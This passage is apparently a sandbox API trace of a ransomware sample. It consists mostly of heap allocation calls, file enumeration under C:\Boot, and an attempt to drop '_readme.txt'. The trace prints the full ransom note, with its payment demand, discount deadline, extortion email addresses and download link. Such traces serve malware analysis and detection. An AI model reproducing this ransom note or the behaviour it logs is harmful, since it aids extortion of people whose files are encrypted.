Size=0x860) returned 0x3a83058 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.707] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.707] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.708] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.708] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.709] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.709] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.710] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.710] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.711] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.711] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.712] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.712] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.712] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.712] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.712] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.712] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.712] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.712] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.712] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.712] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.712] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0209.712] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.712] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.712] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.712] PathFindFileNameW (pszPath="") returned="" [0209.712] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.713] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.713] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.713] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.713] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.713] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.713] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.713] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0209.713] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.713] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.713] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0209.714] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.714] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.714] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.714] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.714] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.714] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.714] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.714] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.714] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.714] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.715] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.715] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.715] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.715] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.715] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.715] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.715] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.715] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.715] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.715] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.715] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.715] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.715] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.715] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.716] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.716] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.717] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.717] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.717] HeapFree (in: 